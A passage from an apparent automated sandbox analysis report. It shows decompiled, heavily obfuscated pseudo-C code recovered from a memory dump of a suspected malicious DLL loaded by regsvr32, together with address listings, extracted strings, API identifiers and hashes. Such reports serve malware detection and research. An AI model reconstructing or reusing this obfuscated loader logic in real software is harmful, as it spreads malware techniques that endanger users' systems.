									_v1088 = _v1088 | 0x88c330e6;
									_v1088 = _v1088 ^ 0x88c7f1ed;
									_v1076 = 0x4fc21e;
									_v1076 = _v1076 << 0xb;
									_v1076 = _v1076 ^ 0x7e10f000;
									_v1068 = 0xa03000;
									_v1068 = _v1068 ^ 0xdfb0c737;
									_v1068 = _v1068 ^ 0xdf10f727;
									_v1128 = 0x3383bb;
									_v1128 = _v1128 + 0xffffb552;
									_v1128 = _v1128 * 3;
									_v1128 = _v1128 + 0xe7e9;
									_v1128 = _v1128 ^ 0x009eaeee;
									_v1120 = 0xdbdbdb;
									_v1120 = _v1120 + 0x8df4;
									_v1120 = _v1120 ^ 0xa4237c56;
									_v1120 = _v1120 ^ 0x53b59ebc;
									_v1120 = _v1120 ^ 0xf74db385;
									_v1124 = 0x30ad12;
									_v1124 = _v1124 + 0xffff2e62;
									_v1124 = _v1124 + 0x1bf1;
									_v1124 = _v1124 ^ 0x0025784f;
									_v1096 = 0x38a6bc;
									_v1096 = _v1096 >> 0x10;
									_v1096 = _v1096 ^ 0x174e9b76;
									_v1096 = _v1096 | 0x05af97a6;
									_v1096 = _v1096 ^ 0x17ecd753;
									_v1112 = 0xaf5d99;
									_v1112 = _v1112 >> 0x10;
									_v1112 = _v1112 + 0x3a44;
									_v1112 = _v1112 * 0x69;
									_v1112 = _v1112 ^ 0x0014692c;
									_v1100 = 0x909ff3;
									_v1100 = _v1100 | 0x21ff353b;
									_v1100 = _v1100 ^ 0x21f33a52;
									_v1108 = 0x2e99ed;
									_v1108 = _v1108 * 0x71;
									_v1108 = _v1108 * 0x2d;
									_v1108 = _v1108 ^ 0x9da3a17c;
									_v1060 = 0xb59a0e;
									_v1060 = _v1060 | 0x17ee1ec4;
									_v1060 = _v1060 ^ 0x17fac0a7;
									_v1064 = 0x260896;
									_v1064 = _v1064 / _t503;
									_v1064 = _v1064 ^ 0x000ab9fe;
									_v1116 = 0xebecb5;
									_t504 = 0x6b;
									_v1116 = _v1116 / _t504;
									_v1116 = _v1116 ^ 0x2b395910;
									_v1116 = _v1116 | 0x55c1835f;
									_v1116 = _v1116 ^ 0x7ff24d24;
									_v1084 = 0xe8fcfb;
									_t505 = 0x78;
									_v1084 = _v1084 / _t505;
									_v1084 = _v1084 << 6;
									_v1084 = _v1084 ^ 0x00780aa8;
									_v1080 = 0x4f91d;
									_v1080 = _v1080 * 0x24;
									_v1080 = _v1080 ^ 0x00bf1079;
									_v1092 = 0x33ae39;
									_v1092 = _v1092 | 0xebc6690e;
									_v1092 = _v1092 << 8;
									_v1092 = _v1092 ^ 0xf7e06f8e;
									_t492 = E003C78CD(_v1128, _v1120, _v1124, _t505, _t505, _v1096, _t505, _v1112, _v1100, _v1108, _t493, _v1060, _v1068, _t548,  &_v520, _v1064, _v1116, _t548, _v1088, _t505, _t505, _v1084, _v1076, _v1104, _v1080, _v1092);
									_t552 = _t492;
									_t553 =  &(_t553[0x18]);
									if(_t492 == 0) {
										goto L11;
									} else {
										_t494 = 0x7c907;
										_v1072 = 1;
										while(1) {
											L1:
											_t518 = 0x5c;
											goto L2;
										}
									}
								}
							}
						}
						goto L27;
						L24:
					} while (_t494 != 0x8f67a);
					goto L27;
				}
			}

0x003cc7b4
0x003cc7ba
0x003cc7bf
0x003cc7c5
0x003cc7cc
0x003cc7d2
0x003cc7de
0x003cc7df
0x003cc7e0
0x003cc7e1
0x003cc7e5
0x003cc7e5
0x003cc7e7
0x003cc7e8
0x003cc7e8
0x003cc7e8
0x003cc7e8
0x003cc7ee
0x00000000
0x00000000
0x003cc7f4
0x003cca3c
0x003cca42
0x003cca4d
0x003cca4a
0x003cca4a
0x003cca52
0x003cca55
0x00000000
0x003cc7fa
0x003cc800
0x003cc9c2
0x003cc9d2
0x003cc9d6
0x003cc9da
0x003cc9e2
0x003cc9ea
0x003cc9f2
0x003cc9fa
0x003cca02
0x003cca0a
0x003cca0f
0x003cca17
0x003cca2b
0x003cca32
0x003cca32
0x003cc7e5
0x003cc7e5
0x003cc7e7
0x00000000
0x003cc7e7
0x003cc806
0x003cc80c
0x003ccfc2
0x003ccfca
0x003ccfd2
0x003ccfd6
0x003ccfde
0x003ccfe6
0x003ccfee
0x003ccff6
0x003ccffb
0x003cd003
0x003cd00b
0x003cd010
0x003cd01e
0x003cd022
0x003cd036
0x003cc812
0x003cc818
0x003cc8c2
0x003cc8cc
0x003cc8d1
0x003cc8d9
0x003cc8e1
0x003cc8ef
0x003cc8f4
0x003cc8ff
0x003cc900
0x003cc901
0x003cc902
0x003cc906
0x003cc90e
0x003cc91b
0x003cc91f
0x003cc927
0x003cc92f
0x003cc941
0x003cc945
0x003cc94d
0x003cc955
0x003cc95d
0x003cc965
0x003cc96d
0x003cc972
0x003cc97a
0x003cc982
0x003cc987
0x003cc98f
0x003cc9b0
0x003cc9b5
0x003cc9b8
0x003cc7e5
0x003cc7e5
0x003cc7e7
0x00000000
0x003cc7e7
0x003cc81e
0x003cc824
0x00000000
0x003cc82a
0x003cc82a
0x003cc832
0x003cc83a
0x003cc842
0x003cc847
0x003cc84f
0x003cc857
0x003cc85f
0x003cc864
0x003cc86c
0x003cc874
0x003cc879
0x003cc881
0x003cc889
0x003cc891
0x003cc896
0x003cc8b0
0x003cc8b5
0x003cc8b8
0x003cc7e5
0x003cc7e5
0x003cc7e7
0x00000000
0x003cc7e7
0x003cc7e5
0x003cc824
0x003cc818
0x003cc80c
0x003cc800
0x003cd03d
0x003cd04b
0x003cd04b
0x003cca65
0x003ccdc3
0x003ccdcd
0x003ccdd8
0x003ccddd
0x003ccde7
0x003ccdea
0x003ccdee
0x003ccdf6
0x003ccdfe
0x003cce06
0x003cce0e
0x003cce16
0x003cce1e
0x003cce2b
0x003cce2f
0x003cce37
0x003cce3f
0x003cce47
0x003cce4f
0x003cce6c
0x003cce71
0x003cce83
0x003cce88
0x003cce8e
0x003cce9a
0x003cce9d
0x003ccea1
0x003ccea9
0x003cceb6
0x003cceba
0x003ccec2
0x003cceca
0x003cced2
0x003cceda
0x003ccee2
0x003cceec
0x003ccef0
0x003ccef8
0x003ccf00
0x003ccf06
0x003ccf0a
0x003ccf32
0x003ccf37
0x003ccf3f
0x003ccf47
0x003ccf4f
0x003ccf54
0x003ccf5c
0x003ccf64
0x003ccf6c
0x003ccf71
0x003ccf79
0x003ccf87
0x003ccf8b
0x003ccf90
0x003ccfa4
0x003ccfa9
0x003ccfac
0x003ccfb3
0x00000000
0x003cca6b
0x003cca71
0x003ccd30
0x003ccd38
0x003ccd3d
0x003ccd45
0x003ccd4d
0x003ccd55
0x003ccd5d
0x003ccd65
0x003ccd6d
0x003ccd75
0x003ccd7d
0x003ccd82
0x003ccd8a
0x003ccd92
0x003ccda7
0x003ccdac
0x003ccdae
0x003ccdb3
0x003ccdb9
0x00000000
0x003ccdb9
0x003cca77
0x003cca7d
0x00000000
0x003cca83
0x003cca83
0x003cca8d
0x003cca9c
0x003cca9f
0x003ccaa3
0x003ccaab
0x003ccab3
0x003ccabb
0x003ccac3
0x003ccacb
0x003ccad3
0x003ccadb
0x003ccae0
0x003ccae8
0x003ccaf0
0x003ccaf8
0x003ccb00
0x003ccb08
0x003ccb15
0x003ccb19
0x003ccb21
0x003ccb29
0x003ccb31
0x003ccb39
0x003ccb41
0x003ccb49
0x003ccb51
0x003ccb59
0x003ccb61
0x003ccb69
0x003ccb71
0x003ccb79
0x003ccb7e
0x003ccb86
0x003ccb8e
0x003ccb96
0x003ccb9e
0x003ccba3
0x003ccbb0
0x003ccbb4
0x003ccbbc
0x003ccbc4
0x003ccbcc
0x003ccbd4
0x003ccbe1
0x003ccbea
0x003ccbee
0x003ccbf6
0x003ccbfe
0x003ccc06
0x003ccc0e
0x003ccc1e
0x003ccc22
0x003ccc2a
0x003ccc36
0x003ccc3b
0x003ccc41
0x003ccc49
0x003ccc51
0x003ccc59
0x003ccc65
0x003ccc68
0x003ccc6c
0x003ccc71
0x003ccc79
0x003ccc86
0x003ccc91
0x003ccc99
0x003ccca1
0x003ccca9
0x003cccae
0x003ccd0c
0x003ccd11
0x003ccd13
0x003ccd18
0x00000000
0x003ccd1e
0x003ccd1e
0x003ccd23
0x003cc7e5
0x003cc7e5
0x003cc7e7
0x00000000
0x003cc7e7
0x003cc7e5
0x003ccd18
0x003cca7d
0x003cca71
0x00000000
0x003ccfb4
0x003ccfb4
0x00000000
0x003ccfc0

Strings

'(, xrefs: 003CCFE6
8S9, xrefs: 003CD003
iL, xrefs: 003CC927
_t/, xrefs: 003CCF90
D:, xrefs: 003CCBA3
qo, xrefs: 003CCFDE

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: '($8S9$D:$_t/$iL$qo
API String ID: 1725840886-1736719730
Opcode ID: 202959c86fed19cd4f957819345af56059201ee040d5fed06ca45561864d42f2
Instruction ID: 376b8abf60f49056a7eb684d457cd9e76216a0663bf3796dcbcc23421be957ec
Opcode Fuzzy Hash: 202959c86fed19cd4f957819345af56059201ee040d5fed06ca45561864d42f2
Instruction Fuzzy Hash: FC221FB24083429FD359CF21D58A91BBBE1FBC8748F108A1DF1D696260D3B59A49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 003CB7B5 Relevance: 7.9, Strings: 6, Instructions: 414
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E003CB7B5() {
				char _v520;
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				void* _t408;
				signed int _t420;
				signed int _t429;
				signed int _t431;
				signed int _t450;
				signed int _t464;
				signed int _t471;
				void* _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t478;
				signed int _t481;
				signed int _t483;
				signed int _t488;
				signed int _t489;
				signed int _t493;
				signed int _t494;
				signed int _t495;
				signed int _t497;
				signed int _t498;
				intOrPtr _t533;
				signed int _t538;
				signed int* _t540;
				signed int* _t542;

				_t542 =  &_v580;
				_t539 = _v528;
				_t408 = 0x486b7;
				_v532 = 0x8331;
				_t471 = 0;
				_t541 = _v532;
				_t538 = _v532;
				while(1) {
					L1:
					_t473 = 0x60be;
					do {
						L2:
						while(_t408 != _t473) {
							if(_t408 == 0x28e07) {
								_v580 = 0xcd20b9;
								_t483 = 0x79;
								_v580 = _v580 / _t483;
								_v580 = _v580 * 0x7c;
								_v580 = _v580 << 0xf;
								_v580 = _v580 ^ 0x1b4b2203;
								_v576 = 0x1271da;
								_v576 = _v576 * 0x77;
								_v576 = _v576 | 0xad536f46;
								_t404 =  &_v576;
								 *_t404 = _v576 ^ 0xadd41725;
								__eflags =  *_t404;
								E003D4FB8(_t541, _v580, _v576);
							} else {
								if(_t408 == 0x486b7) {
									_t408 = 0x8d8ef;
									continue;
								} else {
									if(_t408 == 0x5b989) {
										_v580 = 0xe71f86;
										_push(_t473);
										_push(_t473);
										_v580 = _v580 * 0xe;
										_v580 = _v580 + 0x907e;
										_v580 = _v580 | 0x292e2fe0;
										_v580 = _v580 ^ 0x2dae7ff2;
										_t539 = _v580;
										_v552 = 0x6b3bc6;
										_v552 = _v552 ^ 0x459d1396;
										_v552 = _v552 ^ 0x45ffbe2a;
										_v556 = 0x190eb6;
										_v556 = _v556 | 0xdd8a852f;
										_v556 = _v556 ^ 0xdd9c0927;
										_v572 = 0x6ddd6c;
										_v572 = _v572 | 0x13705712;
										_v572 = _v572 ^ 0x137a531f;
										_v528 = _v580;
										_t538 = E003C8D52(_t473, _v580, __eflags);
										__eflags = _t538;
										_t473 = 0x60be;
										_t408 =  !=  ? 0x60be : 0x28e07;
										continue;
									} else {
										if(_t408 == 0x8d8ef) {
											_v580 = 0x625fe4;
											_t159 =  &_v580; // 0x625fe4
											_t488 = 0x12;
											_v580 =  *_t159 * 0x17;
											_v580 = _v580 << 8;
											_v580 = _v580 << 0xf;
											_v580 = _v580 ^ 0xbe06568d;
											_v572 = 0x1ac9cc;
											_v572 = _v572 * 0x38;
											_v572 = _v572 ^ 0x05d717f1;
											_v576 = 0xce53ba;
											_v576 = _v576 + 0xffff7e15;
											_v576 = _v576 / _t488;
											_v576 = _v576 ^ 0x000d579c;
											E003C2493(_t488,  &_v520, _v580, _v572, _v576);
											_v576 = 0x645ac3;
											_v576 = _v576 >> 0xc;
											_v576 = _v576 | 0xcad394e5;
											_v576 = _v576 ^ 0xcade0916;
											_v572 = 0xc9247d;
											_v572 = _v572 | 0x9a79b01e;
											_v572 = _v572 ^ 0x9af95f05;
											_v580 = 0x9b9796;
											_v580 = _v580 >> 0x10;
											_v580 = _v580 << 0xf;
											_t489 = 0x1d;
											_v580 = _v580 / _t489;
											_v580 = _v580 ^ 0x0006c5c7;
											_t450 = E003D7C07( &_v520, _v576, _v572, _v580);
											_v572 = 0x455ae1;
											_v572 = _v572 << 0xa;
											_t542 =  &(_t542[5]);
											_v572 = _v572 ^ 0x156b8401;
											_v532 = _t450;
											 *((short*)(_t450 - _v572 + _v572)) = 0;
											_t408 = 0x90fb6;
											while(1) {
												L1:
												_t473 = 0x60be;
												goto L2;
											}
										} else {
											if(_t408 == 0x90fb6) {
												_v552 = 0x544737;
												_t50 =  &_v552; // 0x544737
												_t493 = 0x3d;
												_v552 =  *_t50 * 0x71;
												_v552 = _v552 ^ 0x27336f47;
												_v572 = 0x6f983;
												_v572 = _v572 << 2;
												_v572 = _v572 ^ 0x001be60d;
												_v548 = 0xf8e262;
												_v548 = _v548 | 0xa5ad1b7d;
												_t494 = 0x6a;
												_v548 = _v548 / _t493;
												_v548 = _v548 ^ 0x02b89f62;
												_v568 = 0x1b6d90;
												_v568 = _v568 + 0xffff28cc;
												_v568 = _v568 << 8;
												_v568 = _v568 >> 2;
												_v568 = _v568 ^ 0x06a59701;
												_v564 = 0xa61f32;
												_v564 = _v564 + 0xffff6dee;
												_v564 = _v564 >> 1;
												_v564 = _v564 / _t494;
												_v564 = _v564 ^ 0x0000c7eb;
												_v576 = 0x5ac253;
												_v576 = _v576 ^ 0xd7c420d9;
												_v576 = _v576 ^ 0xd79ee289;
												_v580 = 0x4e4dca;
												_v580 = _v580 << 6;
												_v580 = _v580 << 9;
												_v580 = _v580 << 0xf;
												_v580 = _v580 ^ 0x8002f16a;
												_v560 = 0x7305c3;
												_v560 = _v560 << 4;
												_v560 = _v560 << 5;
												_v560 = _v560 + 0xffff47ae;
												_v560 = _v560 ^ 0xe606320c;
												_v556 = 0xa0e898;
												_v556 = _v556 | 0x49cd2323;
												_v556 = _v556 ^ 0x49ed1f44;
												_v544 = 0x3e9fbc;
												_v544 = _v544 ^ 0xfd8dc43b;
												_v544 = _v544 | 0x1a140a35;
												_v544 = _v544 ^ 0xffb41125;
												_v540 = 0x23eb69;
												_v540 = _v540 | 0x5e012ea7;
												_t495 = 0x14;
												_v540 = _v540 / _t495;
												_v540 = _v540 ^ 0x04b0cbe6;
												_v536 = 0x1b7619;
												_v536 = _v536 | 0x40db1f73;
												_v536 = _v536 ^ 0x40da372b;
												_t464 = E003C9A53(_v572, _v580,  &_v520, _v576, _v560, _v564 | _v568 | _v548, _v556, _t495, _v544, _v552, _t495, _v540, _v536);
												_t541 = _t464;
												_t542 =  &(_t542[0xb]);
												__eflags = _t464 - 0xffffffff;
												if(__eflags != 0) {
													_t408 = 0x5b989;
													while(1) {
														L1:
														_t473 = 0x60be;
														goto L2;
													}
												}
											} else {
												_t550 = _t408 - 0xf28c9;
												if(_t408 != 0xf28c9) {
													goto L26;
												} else {
													_v564 = 0xe1d630;
													_v564 = _v564 + 0xac9d;
													_t497 = 0x64;
													_v564 = _v564 / _t497;
													_v564 = _v564 << 4;
													_v564 = _v564 ^ 0x00247eab;
													_v560 = 0x4f3fda;
													_t498 = 0xd;
													_v560 = _v560 / _t498;
													_v560 = _v560 << 6;
													_v560 = _v560 ^ 0x018472e0;
													_v568 = 0x59ecdd;
													_v568 = _v568 + 0x9aae;
													_v568 = _v568 * 0x6e;
													_v568 = _v568 | 0x75f1a62a;
													_v568 = _v568 ^ 0x77f073ef;
													_v580 = 0xfcd909;
													_v580 = _v580 >> 0xb;
													_v580 = _v580 + 0xf644;
													_v580 = _v580 ^ 0x00092d42;
													_t45 =  &_v580; // 0x92d42
													E003C79D0(_v564, _v560, _t550, _v568, _t538,  *_t45);
													_t542 =  &(_t542[3]);
													_t408 = 0x28e07;
													while(1) {
														L1:
														_t473 = 0x60be;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L29:
							__eflags = 0;
							return 0;
						}
						_v568 = 0xb6097;
						_t474 = 0x45;
						_v568 = _v568 * 0x78;
						_t475 = 0xa;
						_v568 = _v568 / _t474;
						_v568 = _v568 + 0xfe42;
						_v568 = _v568 ^ 0x0014c7a0;
						_v552 = 0xd1e617;
						_v552 = _v552 / _t475;
						_v552 = _v552 ^ 0x0018ea8a;
						_v556 = 0xd5a4e5;
						_v556 = _v556 + 0xffff37a1;
						_v556 = _v556 ^ 0x00d164d9;
						_v564 = 0x46711a;
						_t476 = 0x2b;
						_v564 = _v564 * 0x5a;
						_v564 = _v564 | 0x4d1c2d8e;
						_v564 = _v564 ^ 0xbcb73dab;
						_v564 = _v564 ^ 0xe1631763;
						_v572 = 0xf2d0be;
						_v572 = _v572 >> 8;
						_v572 = _v572 ^ 0x000b746a;
						_v560 = 0xbc0dbd;
						_v560 = _v560 + 0x1ae3;
						_v560 = _v560 * 0x1a;
						_v560 = _v560 >> 0xf;
						_v560 = _v560 ^ 0x000b113c;
						_v580 = 0x23aaf3;
						_v580 = _v580 * 0x34;
						_v580 = _v580 + 0xffff4b3c;
						_v580 = _v580 / _t476;
						_v580 = _v580 ^ 0x002ac603;
						_t420 = E003D9A90(_t539, _v568, _t476, _v552, _t476, _v556,  &_v524, _v564, _t541, _v572, _t476, _v560, _t538, _v580);
						_t542 =  &(_t542[0xc]);
						__eflags = _t420;
						if(_t420 != 0) {
							_t540 = _t538;
							while(1) {
								_v576 = 0x28f2ad;
								_t481 = 0x6f;
								_v576 = _v576 / _t481;
								_v576 = _v576 + 0x115f;
								_v576 = _v576 ^ 0x00006fcb;
								__eflags = _t540[1] - _v576;
								if(_t540[1] != _v576) {
									goto L19;
								}
								L18:
								_v576 = 0xa535b1;
								_v576 = _v576 ^ 0xd8cfccc8;
								_v576 = _v576 + 0xffffe8fb;
								_v576 = _v576 ^ 0xd86cd675;
								_v580 = 0xe1ddb6;
								_v580 = _v580 | 0x8b910103;
								_v580 = _v580 + 0x6ece;
								_v580 = _v580 | 0xaa2b48cb;
								_v580 = _v580 ^ 0xabf4a59e;
								_v572 = 0x2675c2;
								_v572 = _v572 + 0xffffaaa1;
								_v572 = _v572 ^ 0x002081d7;
								_t431 = E003DBF03(_v576, _v580, _v532, _v572,  &(_t540[3]));
								_t542 =  &(_t542[3]);
								__eflags = _t431;
								if(_t431 == 0) {
									_t471 = 1;
									__eflags = 1;
								} else {
									goto L19;
								}
								L22:
								_t539 = _v528;
								goto L23;
								L19:
								_t429 =  *_t540;
								__eflags = _t429;
								if(_t429 != 0) {
									_t540 = _t540 + _t429;
									_v576 = 0x28f2ad;
									_t481 = 0x6f;
									_v576 = _v576 / _t481;
									_v576 = _v576 + 0x115f;
									_v576 = _v576 ^ 0x00006fcb;
									__eflags = _t540[1] - _v576;
									if(_t540[1] != _v576) {
										goto L19;
									}
								}
								goto L22;
							}
						}
						L23:
						__eflags = _t471;
						if(_t471 == 0) {
							_t473 = 0x60be;
							_t408 = 0x60be;
							goto L26;
						} else {
							_v580 = 0xf9522f;
							_v580 = _v580 << 4;
							_v580 = _v580 ^ 0x9b8aa7f2;
							_v580 = _v580 << 0xe;
							_v580 = _v580 ^ 0xe1469c3e;
							_v576 = 0x5f6444;
							_t478 = 0x1c;
							_v576 = _v576 * 0x5f;
							_v576 = _v576 / _t478;
							_v576 = _v576 ^ 0x014539bd;
							_t533 =  *0x3e2224; // 0x0
							E003D696C(_v580,  *((intOrPtr*)(_t533 + 0x1c)), _v576);
							_t408 = 0xf28c9;
							goto L1;
						}
						goto L29;
						L26:
						__eflags = _t408 - 0x9267b;
					} while (__eflags != 0);
					goto L29;
				}
			}

0x003cb7b5
0x003cb7be
0x003cb7c2
0x003cb7c7
0x003cb7cf
0x003cb7d1
0x003cb7d6
0x003cb7da
0x003cb7da
0x003cb7da
0x003cb7df
0x00000000
0x003cb7df
0x003cb7ec
0x003cbf01
0x003cbf11
0x003cbf16
0x003cbf1f
0x003cbf23
0x003cbf28
0x003cbf30
0x003cbf3d
0x003cbf41
0x003cbf49
0x003cbf49
0x003cbf49
0x003cbf59
0x003cb7f2
0x003cb7f7
0x003cbc77
0x00000000
0x003cb7fd
0x003cb802
0x003cbbd1
0x003cbbde
0x003cbbdf
0x003cbbe0
0x003cbbe4
0x003cbbec
0x003cbbf4
0x003cbbfc
0x003cbc02
0x003cbc0a
0x003cbc12
0x003cbc1a
0x003cbc22
0x003cbc2a
0x003cbc32
0x003cbc3a
0x003cbc42
0x003cbc56
0x003cbc5f
0x003cbc68
0x003cbc6a
0x003cbc6f
0x00000000
0x003cb808
0x003cb80d
0x003cbab1
0x003cbabb
0x003cbac2
0x003cbac3
0x003cbac7
0x003cbacc
0x003cbad1
0x003cbad9
0x003cbae6
0x003cbaea
0x003cbaf2
0x003cbafa
0x003cbb0c
0x003cbb10
0x003cbb24
0x003cbb29
0x003cbb33
0x003cbb38
0x003cbb40
0x003cbb48
0x003cbb50
0x003cbb58
0x003cbb60
0x003cbb68
0x003cbb6d
0x003cbb78
0x003cbb7f
0x003cbb83
0x003cbb97
0x003cbb9c
0x003cbba6
0x003cbbab
0x003cbbae
0x003cbbbc
0x003cbbc4
0x003cbbc7
0x003cb7da
0x003cb7da
0x003cb7da
0x00000000
0x003cb7da
0x003cb813
0x003cb818
0x003cb8e2
0x003cb8ec
0x003cb8f3
0x003cb8f6
0x003cb8fa
0x003cb902
0x003cb90a
0x003cb90f
0x003cb917
0x003cb91f
0x003cb92d
0x003cb92e
0x003cb934
0x003cb93c
0x003cb944
0x003cb94c
0x003cb951
0x003cb956
0x003cb95e
0x003cb966
0x003cb96e
0x003cb97a
0x003cb980
0x003cb988
0x003cb990
0x003cb9a0
0x003cb9a8
0x003cb9b0
0x003cb9b5
0x003cb9ba
0x003cb9bf
0x003cb9c7
0x003cb9cf
0x003cb9d4
0x003cb9d9
0x003cb9e1
0x003cb9e9
0x003cb9f1
0x003cb9f9
0x003cba01
0x003cba09
0x003cba11
0x003cba19
0x003cba21
0x003cba29
0x003cba35
0x003cba38
0x003cba3c
0x003cba44
0x003cba4c
0x003cba54
0x003cba94
0x003cba99
0x003cba9b
0x003cba9e
0x003cbaa1
0x003cbaa7
0x003cb7da
0x003cb7da
0x003cb7da
0x00000000
0x003cb7da
0x003cb7da
0x003cb81e
0x003cb81e
0x003cb823
0x00000000
0x003cb829
0x003cb829
0x003cb833
0x003cb841
0x003cb846
0x003cb84c
0x003cb851
0x003cb859
0x003cb865
0x003cb868
0x003cb86c
0x003cb871
0x003cb879
0x003cb881
0x003cb88e
0x003cb892
0x003cb89a
0x003cb8a2
0x003cb8aa
0x003cb8af
0x003cb8b7
0x003cb8bf
0x003cb8d0
0x003cb8d5
0x003cb8d8
0x003cb7da
0x003cb7da
0x003cb7da
0x00000000
0x003cb7da
0x003cb7da
0x003cb823
0x003cb818
0x003cb80d
0x003cb802
0x003cb7f7
0x003cbf62
0x003cbf62
0x003cbf6b
0x003cbf6b
0x003cbc81
0x003cbc92
0x003cbc95
0x003cbc9f
0x003cbca0
0x003cbca6
0x003cbcae
0x003cbcb6
0x003cbcc6
0x003cbccc
0x003cbcd4
0x003cbcdc
0x003cbce4
0x003cbcec
0x003cbcf9
0x003cbcfa
0x003cbcfe
0x003cbd06
0x003cbd0e
0x003cbd16
0x003cbd1e
0x003cbd23
0x003cbd2b
0x003cbd33
0x003cbd40
0x003cbd44
0x003cbd49
0x003cbd51
0x003cbd5e
0x003cbd62
0x003cbd70
0x003cbd78
0x003cbda4
0x003cbda9
0x003cbdac
0x003cbdae
0x003cbdb4
0x003cbdb6
0x003cbdb6
0x003cbdc6
0x003cbdc9
0x003cbdcd
0x003cbdd5
0x003cbde1
0x003cbde4
0x00000000
0x00000000
0x003cbdea
0x003cbdea
0x003cbdf5
0x003cbdfd
0x003cbe05
0x003cbe0d
0x003cbe15
0x003cbe1d
0x003cbe25
0x003cbe2d
0x003cbe35
0x003cbe3d
0x003cbe45
0x003cbe5e
0x003cbe63
0x003cbe66
0x003cbe68
0x003cbe79
0x003cbe79
0x00000000
0x00000000
0x00000000
0x003cbe7a
0x003cbe7a
0x00000000
0x003cbe6a
0x003cbe6a
0x003cbe6c
0x003cbe6e
0x003cbe70
0x003cbdb6
0x003cbdc6
0x003cbdc9
0x003cbdcd
0x003cbdd5
0x003cbde1
0x003cbde4
0x00000000
0x00000000
0x003cbde4
0x00000000
0x003cbe6e
0x003cbdb6
0x003cbe7e
0x003cbe7e
0x003cbe80
0x003cbeed
0x003cbef2
0x00000000
0x003cbe82
0x003cbe82
0x003cbe8c
0x003cbe91
0x003cbe99
0x003cbe9e
0x003cbea6
0x003cbeb5
0x003cbeb6
0x003cbec0
0x003cbec4
0x003cbed0
0x003cbedd
0x003cbee3
0x00000000
0x003cbee3
0x00000000
0x003cbef4
0x003cbef4
0x003cbef4
0x00000000
0x003cbeff

Strings

B-, xrefs: 003CB8BF
Dd_, xrefs: 003CBEA6
7GT, xrefs: 003CB8EC
/.), xrefs: 003CBBEC
i#, xrefs: 003CBA21
Go3', xrefs: 003CB8FA

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: 7GT$B-$Dd_$Go3'$i#$/.)
API String ID: 823142352-858751348
Opcode ID: 75736039b94b9b24cc6019667bc35bd11a1b2a9f957db7f17c1d239961d6c768
Instruction ID: 149e1d7d45a434e3f67cb8911e71b6da4a5aa5b1820ef488f12c2363bbcdf6b5
Opcode Fuzzy Hash: 75736039b94b9b24cc6019667bc35bd11a1b2a9f957db7f17c1d239961d6c768
Instruction Fuzzy Hash: C412FE711083429FD349CF25D54A90BBBE1FBC8748F108A1EF596A6260D7B5DA09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 003C323D Relevance: 7.9, Strings: 6, Instructions: 413
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E003C323D(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16, intOrPtr _a20) {
				char _v32;
				intOrPtr _v48;
				char* _v52;
				signed int _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v112;
				char _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* __ebx;
				void* __ebp;
				void* _t389;
				signed int _t391;
				signed int _t394;
				signed int _t399;
				void* _t425;
				signed int _t434;
				intOrPtr _t439;
				signed int _t449;
				signed int* _t452;
				signed int _t454;
				signed int _t457;
				signed int _t460;
				char* _t465;
				signed int _t466;
				signed int _t476;
				signed int _t478;
				void* _t492;
				intOrPtr* _t502;
				signed int _t504;
				void* _t505;
				char* _t506;
				void* _t507;
				void* _t509;
				void* _t510;
				void* _t514;

				_t452 = _a12;
				_push(_a20);
				_t502 = _a16;
				_push(_t502);
				_push(_t452);
				_push(_a8);
				_v124 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t389);
				_v100 = 0xd0c5a;
				_t510 = _t509 + 0x1c;
				_v96 = 0x48fdc;
				_t507 = 0;
				_t391 = 0x3a272;
				_v92 = 0xfb16e;
				while(1) {
					L1:
					while(1) {
						_t514 = _t391 - 0x61747;
						if(_t514 > 0) {
							goto L19;
						}
						L3:
						if(_t514 == 0) {
							_t504 =  *_t452;
							_v140 = 0x82c351;
							_v140 = _v140 * 0x19;
							_v140 = _v140 ^ 0x370b57a4;
							_v140 = _v140 ^ 0x3bc500a8;
							_v128 = 0xd6c36d;
							_v128 = _v128 ^ 0x5e0bfddf;
							_v128 = _v128 | 0x774a970d;
							_v128 = _v128 ^ 0x7fdda309;
							_v136 = 0x32397b;
							_v136 = _v136 * 0x31;
							_v136 = _v136 ^ 0x06148a1f;
							_v136 = _v136 + 0xffff0a6c;
							_v136 = _v136 ^ 0x0f8eb3a7;
							_v132 = 0x518c7;
							_v132 = _v132 + 0x2613;
							_v132 = _v132 + 0xb78f;
							_v132 = _v132 ^ 0x000104d5;
							E003C4D13(_t504, _v140, _v128, _v136, _v132);
							_v140 = 0xb29a76;
							_v140 = _v140 << 7;
							_v140 = _v140 ^ 0x594d3b40;
							_t155 =  &_v140; // 0x594d3b40
